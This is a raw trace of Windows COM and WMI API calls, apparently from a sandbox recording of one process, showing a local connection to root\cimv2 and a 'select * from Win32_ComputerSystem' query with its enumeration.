	[0199.104] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0199.105] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0199.105] WbemLocator:IUnknown:AddRef (This=0x1cd11a40) returned 0x2
	[0199.105] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11a40, riid=0x1c6ec930*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec910 | out: ppvObject=0x1c6ec910*=0x1cd11a40) returned 0x0
	[0199.105] WbemLocator:IUnknown:Release (This=0x1cd11a40) returned 0x2
	[0199.105] WbemLocator:IUnknown:Release (This=0x1cd11a40) returned 0x1
	[0199.105] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6ecd10 | out: puCount=0x1c6ecd10*=0x2) returned 0x0
	[0199.105] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=8, puBuffLength=0x1c6ecd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd10*=0x17, pszText=0x0) returned 0x0
	[0199.105] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=8, puBuffLength=0x1c6ecd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.105] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c6eca00 | out: ppv=0x1c6eca00*=0x1cd11a60) returned 0x0
	[0199.105] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd11a60, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c6ecc90 | out: ppNamespace=0x1c6ecc90*=0x1cd1a6e8) returned 0x0
	[0199.703] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1a6e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec878 | out: ppvObject=0x1c6ec878*=0x1b849270) returned 0x0
	[0199.703] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b849270, pProxy=0x1cd1a6e8, pAuthnSvc=0x1c6ec870, pAuthzSvc=0x1c6ec86c, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868, pImpLevel=0x1c6ec884, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880 | out: pAuthnSvc=0x1c6ec870*=0xa, pAuthzSvc=0x1c6ec86c*=0x0, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868*=0x6, pImpLevel=0x1c6ec884*=0x2, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880*=0x1) returned 0x0
	[0199.703] WbemLocator:IUnknown:Release (This=0x1b849270) returned 0x1
	[0199.703] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1a6e8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec818 | out: ppvObject=0x1c6ec818*=0x1b8492b0) returned 0x0
	[0199.703] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1a6e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec7a8 | out: ppvObject=0x1c6ec7a8*=0x1b849270) returned 0x0
	[0199.703] WbemLocator:IClientSecurity:SetBlanket (This=0x1b849270, pProxy=0x1cd1a6e8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0199.703] WbemLocator:IUnknown:Release (This=0x1b849270) returned 0x2
	[0199.703] WbemLocator:IUnknown:Release (This=0x1b8492b0) returned 0x1
	[0199.703] CoTaskMemFree (pv=0x1b8396e0) 
	[0199.704] WbemLocator:IUnknown:Release (This=0x1cd11a60) returned 0x0
	[0199.704] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1a6e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec490 | out: ppvObject=0x1c6ec490*=0x1b8492b0) returned 0x0
	[0199.704] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8492b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec510 | out: ppvObject=0x1c6ec510*=0x0) returned 0x80004002
	[0199.704] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8492b0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec2a8 | out: ppvObject=0x1c6ec2a8*=0x0) returned 0x80004002
	[0199.705] WbemLocator:IUnknown:AddRef (This=0x1b8492b0) returned 0x3
	[0199.705] CoGetContextToken (in: pToken=0x1c6ec160 | out: pToken=0x1c6ec160) returned 0x0
	[0199.705] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8492b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec120 | out: ppvObject=0x1c6ec120*=0x1b849198) returned 0x0
	[0199.706] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b849198, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec150 | out: pCid=0x1c6ec150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0199.706] WbemLocator:IUnknown:Release (This=0x1b849198) returned 0x3
	[0199.706] CoGetContextToken (in: pToken=0x1c6ec130 | out: pToken=0x1c6ec130) returned 0x0
	[0199.706] WbemLocator:IUnknown:AddRef (This=0x1b8492b0) returned 0x4
	[0199.706] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8492b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec248 | out: ppvObject=0x1c6ec248*=0x1b849280) returned 0x0
	[0199.706] WbemLocator:IUnknown:Release (This=0x1b8492b0) returned 0x4
	[0199.706] WbemLocator:IRpcOptions:Query (in: This=0x1b849280, pPrx=0x1b8492b0, dwProperty=2, pdwValue=0x1c6ec2b8 | out: pdwValue=0x1c6ec2b8) returned 0x80004002
	[0199.706] WbemLocator:IUnknown:Release (This=0x1b849280) returned 0x3
	[0199.707] WbemLocator:IUnknown:Release (This=0x1b8492b0) returned 0x2
	[0199.707] CoGetContextToken (in: pToken=0x1c6ec630 | out: pToken=0x1c6ec630) returned 0x0
	[0199.707] CoGetContextToken (in: pToken=0x1c6ec570 | out: pToken=0x1c6ec570) returned 0x0
	[0199.707] WbemLocator:IUnknown:AddRef (This=0x1b8492b0) returned 0x3
	[0199.707] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8492b0, riid=0x1c6ec6b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec690 | out: ppvObject=0x1c6ec690*=0x1cd1a6e8) returned 0x0
	[0199.707] WbemLocator:IUnknown:Release (This=0x1b8492b0) returned 0x3
	[0199.707] WbemLocator:IUnknown:Release (This=0x1cd1a6e8) returned 0x2
	[0199.707] WbemLocator:IUnknown:Release (This=0x1cd1a6e8) returned 0x1
	[0199.707] CoGetContextToken (in: pToken=0x1c6ecc30 | out: pToken=0x1c6ecc30) returned 0x0
	[0199.707] WbemLocator:IUnknown:AddRef (This=0x1b8492b0) returned 0x2
	[0199.708] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8492b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec800 | out: ppvObject=0x1c6ec800*=0x1b8492b0) returned 0x0
	[0199.708] WbemLocator:IUnknown:Release (This=0x1b8492b0) returned 0x2
	[0199.708] WbemLocator:IUnknown:Release (This=0x1b8492b0) returned 0x1
	[0199.708] CoGetContextToken (in: pToken=0x1c6ec8d0 | out: pToken=0x1c6ec8d0) returned 0x0
	[0199.708] CoGetContextToken (in: pToken=0x1c6ec810 | out: pToken=0x1c6ec810) returned 0x0
	[0199.708] WbemLocator:IUnknown:AddRef (This=0x1b8492b0) returned 0x2
	[0199.708] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8492b0, riid=0x1c6ec950*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec930 | out: ppvObject=0x1c6ec930*=0x1cd1a6e8) returned 0x0
	[0199.708] WbemLocator:IUnknown:Release (This=0x1b8492b0) returned 0x2
	[0199.709] WbemLocator:IUnknown:AddRef (This=0x1cd1a6e8) returned 0x3
	[0199.709] IWbemServices:ExecQuery (in: This=0x1cd1a6e8, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c6ecdc8 | out: ppEnum=0x1c6ecdc8*=0x1cd1c728) returned 0x0
	[0199.720] IUnknown:QueryInterface (in: This=0x1cd1c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9d8 | out: ppvObject=0x1c6ec9d8*=0x1cd1c730) returned 0x0
	[0199.720] IClientSecurity:QueryBlanket (in: This=0x1cd1c730, pProxy=0x1cd1c728, pAuthnSvc=0x1c6ec9d0, pAuthzSvc=0x1c6ec9cc, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8, pImpLevel=0x1c6ec9e4, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0 | out: pAuthnSvc=0x1c6ec9d0*=0xa, pAuthzSvc=0x1c6ec9cc*=0x0, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8*=0x6, pImpLevel=0x1c6ec9e4*=0x2, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0*=0x1) returned 0x0
	[0199.720] IUnknown:Release (This=0x1cd1c730) returned 0x1
	[0199.720] IUnknown:QueryInterface (in: This=0x1cd1c728, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec978 | out: ppvObject=0x1c6ec978*=0x1b849130) returned 0x0
	[0199.720] IUnknown:QueryInterface (in: This=0x1cd1c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec908 | out: ppvObject=0x1c6ec908*=0x1cd1c730) returned 0x0
	[0199.720] IClientSecurity:SetBlanket (This=0x1cd1c730, pProxy=0x1cd1c728, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0199.722] IUnknown:Release (This=0x1cd1c730) returned 0x2
	[0199.722] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x1
	[0199.722] CoTaskMemFree (pv=0x1b839830) 
	[0199.722] IUnknown:QueryInterface (in: This=0x1cd1c728, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5b0 | out: ppvObject=0x1c6ec5b0*=0x1b849130) returned 0x0
	[0199.722] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec630 | out: ppvObject=0x1c6ec630*=0x0) returned 0x80004002
	[0199.723] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec3c8 | out: ppvObject=0x1c6ec3c8*=0x0) returned 0x80004002
	[0199.724] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x3
	[0199.724] CoGetContextToken (in: pToken=0x1c6ec280 | out: pToken=0x1c6ec280) returned 0x0
	[0199.724] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec240 | out: ppvObject=0x1c6ec240*=0x1b849018) returned 0x0
	[0199.724] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b849018, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec270 | out: pCid=0x1c6ec270*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0199.724] WbemLocator:IUnknown:Release (This=0x1b849018) returned 0x3
	[0199.724] CoGetContextToken (in: pToken=0x1c6ec250 | out: pToken=0x1c6ec250) returned 0x0
	[0199.724] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x4
	[0199.724] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec368 | out: ppvObject=0x1c6ec368*=0x1b849100) returned 0x0
	[0199.724] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x4
	[0199.725] WbemLocator:IRpcOptions:Query (in: This=0x1b849100, pPrx=0x1b849130, dwProperty=2, pdwValue=0x1c6ec3d8 | out: pdwValue=0x1c6ec3d8) returned 0x80004002
	[0199.725] WbemLocator:IUnknown:Release (This=0x1b849100) returned 0x3
	[0199.725] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x2
	[0199.725] CoGetContextToken (in: pToken=0x1c6ec750 | out: pToken=0x1c6ec750) returned 0x0
	[0199.725] CoGetContextToken (in: pToken=0x1c6ec690 | out: pToken=0x1c6ec690) returned 0x0
	[0199.725] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x3
	[0199.725] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x1c6ec7d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec7b0 | out: ppvObject=0x1c6ec7b0*=0x1cd1c728) returned 0x0
	[0199.725] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x3
	[0199.725] IUnknown:Release (This=0x1cd1c728) returned 0x2
	[0199.725] IUnknown:Release (This=0x1cd1c728) returned 0x1
	[0199.726] WbemLocator:IUnknown:Release (This=0x1cd1a6e8) returned 0x2
	[0199.726] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6ecd70 | out: puCount=0x1c6ecd70*=0x2) returned 0x0
	[0199.726] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecd70*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd70*=0x17, pszText=0x0) returned 0x0
	[0199.726] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ecd70*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd70*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.726] CoGetContextToken (in: pToken=0x1c6ec970 | out: pToken=0x1c6ec970) returned 0x0
	[0199.726] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0199.726] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x2
	[0199.726] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x1c6ec9f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec9d0 | out: ppvObject=0x1c6ec9d0*=0x1cd1c728) returned 0x0
	[0199.726] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x2
	[0199.726] IUnknown:AddRef (This=0x1cd1c728) returned 0x3
	[0199.727] IEnumWbemClassObject:Clone (in: This=0x1cd1c728, ppEnum=0x1c6ece30 | out: ppEnum=0x1c6ece30*=0x1cd1c8b8) returned 0x0
	[0199.728] IUnknown:QueryInterface (in: This=0x1cd1c8b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca88 | out: ppvObject=0x1c6eca88*=0x1cd1c8c0) returned 0x0
	[0199.728] IClientSecurity:QueryBlanket (in: This=0x1cd1c8c0, pProxy=0x1cd1c8b8, pAuthnSvc=0x1c6eca80, pAuthzSvc=0x1c6eca7c, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78, pImpLevel=0x1c6eca94, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90 | out: pAuthnSvc=0x1c6eca80*=0xa, pAuthzSvc=0x1c6eca7c*=0x0, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78*=0x6, pImpLevel=0x1c6eca94*=0x2, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90*=0x1) returned 0x0
	[0199.728] IUnknown:Release (This=0x1cd1c8c0) returned 0x1
	[0199.728] IUnknown:QueryInterface (in: This=0x1cd1c8b8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca28 | out: ppvObject=0x1c6eca28*=0x1b849bb0) returned 0x0
	[0199.728] IUnknown:QueryInterface (in: This=0x1cd1c8b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9b8 | out: ppvObject=0x1c6ec9b8*=0x1cd1c8c0) returned 0x0
	[0199.728] IClientSecurity:SetBlanket (This=0x1cd1c8c0, pProxy=0x1cd1c8b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0199.730] IUnknown:Release (This=0x1cd1c8c0) returned 0x2
	[0199.730] WbemLocator:IUnknown:Release (This=0x1b849bb0) returned 0x1
	[0199.730] CoTaskMemFree (pv=0x1b839710) 
	[0199.730] IUnknown:QueryInterface (in: This=0x1cd1c8b8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec650 | out: ppvObject=0x1c6ec650*=0x1b849bb0) returned 0x0
	[0199.730] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849bb0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec6d0 | out: ppvObject=0x1c6ec6d0*=0x0) returned 0x80004002
	[0199.731] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849bb0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec468 | out: ppvObject=0x1c6ec468*=0x0) returned 0x80004002
	[0199.732] WbemLocator:IUnknown:AddRef (This=0x1b849bb0) returned 0x3
	[0199.732] CoGetContextToken (in: pToken=0x1c6ec320 | out: pToken=0x1c6ec320) returned 0x0
	[0199.732] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849bb0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec2e0 | out: ppvObject=0x1c6ec2e0*=0x1b849a98) returned 0x0
	[0199.732] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b849a98, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec310 | out: pCid=0x1c6ec310*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0199.732] WbemLocator:IUnknown:Release (This=0x1b849a98) returned 0x3
	[0199.732] CoGetContextToken (in: pToken=0x1c6ec2f0 | out: pToken=0x1c6ec2f0) returned 0x0
	[0199.732] WbemLocator:IUnknown:AddRef (This=0x1b849bb0) returned 0x4
	[0199.732] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849bb0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec408 | out: ppvObject=0x1c6ec408*=0x1b849b80) returned 0x0
	[0199.732] WbemLocator:IUnknown:Release (This=0x1b849bb0) returned 0x4
	[0199.733] WbemLocator:IRpcOptions:Query (in: This=0x1b849b80, pPrx=0x1b849bb0, dwProperty=2, pdwValue=0x1c6ec478 | out: pdwValue=0x1c6ec478) returned 0x80004002
	[0199.733] WbemLocator:IUnknown:Release (This=0x1b849b80) returned 0x3
	[0199.733] WbemLocator:IUnknown:Release (This=0x1b849bb0) returned 0x2
	[0199.733] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0199.733] CoGetContextToken (in: pToken=0x1c6ec730 | out: pToken=0x1c6ec730) returned 0x0
	[0199.733] WbemLocator:IUnknown:AddRef (This=0x1b849bb0) returned 0x3
	[0199.733] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849bb0, riid=0x1c6ec870*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec850 | out: ppvObject=0x1c6ec850*=0x1cd1c8b8) returned 0x0
	[0199.733] WbemLocator:IUnknown:Release (This=0x1b849bb0) returned 0x3
	[0199.733] IUnknown:Release (This=0x1cd1c8b8) returned 0x2
	[0199.734] IUnknown:Release (This=0x1cd1c8b8) returned 0x1
	[0199.734] IUnknown:Release (This=0x1cd1c728) returned 0x2
	[0199.734] CoGetContextToken (in: pToken=0x1c6ecbf0 | out: pToken=0x1c6ecbf0) returned 0x0
	[0199.734] CoGetContextToken (in: pToken=0x1c6ecb30 | out: pToken=0x1c6ecb30) returned 0x0
	[0199.734] WbemLocator:IUnknown:AddRef (This=0x1b849bb0) returned 0x2
	[0199.734] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849bb0, riid=0x1c6ecc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ecc50 | out: ppvObject=0x1c6ecc50*=0x1cd1c8b8) returned 0x0
	[0199.734] WbemLocator:IUnknown:Release (This=0x1b849bb0) returned 0x2
	[0199.734] IUnknown:AddRef (This=0x1cd1c8b8) returned 0x3
	[0199.734] IEnumWbemClassObject:Reset (This=0x1cd1c8b8) returned 0x0
	[0199.735] IUnknown:Release (This=0x1cd1c8b8) returned 0x2
	[0199.735] CoTaskMemAlloc (cb=0x8) returned 0x1b84ab50
	[0199.735] IEnumWbemClassObject:Next (in: This=0x1cd1c8b8, lTimeout=-1, uCount=0x1, apObjects=0x1b84ab50, puReturned=0x1c6ece78 | out: apObjects=0x1b84ab50*=0x1cd1c960, puReturned=0x1c6ece78*=0x1) returned 0x0
	[0199.737] IUnknown:QueryInterface (in: This=0x1cd1c960, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec1a0 | out: ppvObject=0x1c6ec1a0*=0x1cd1c960) returned 0x0
	[0199.738] IUnknown:QueryInterface (in: This=0x1cd1c960, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec220 | out: ppvObject=0x1c6ec220*=0x0) returned 0x80004002
	[0199.738] IUnknown:QueryInterface (in: This=0x1cd1c960, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ebfb8 | out: ppvObject=0x1c6ebfb8*=0x0) returned 0x80004002
	[0199.738] IUnknown:AddRef (This=0x1cd1c960) returned 0x3
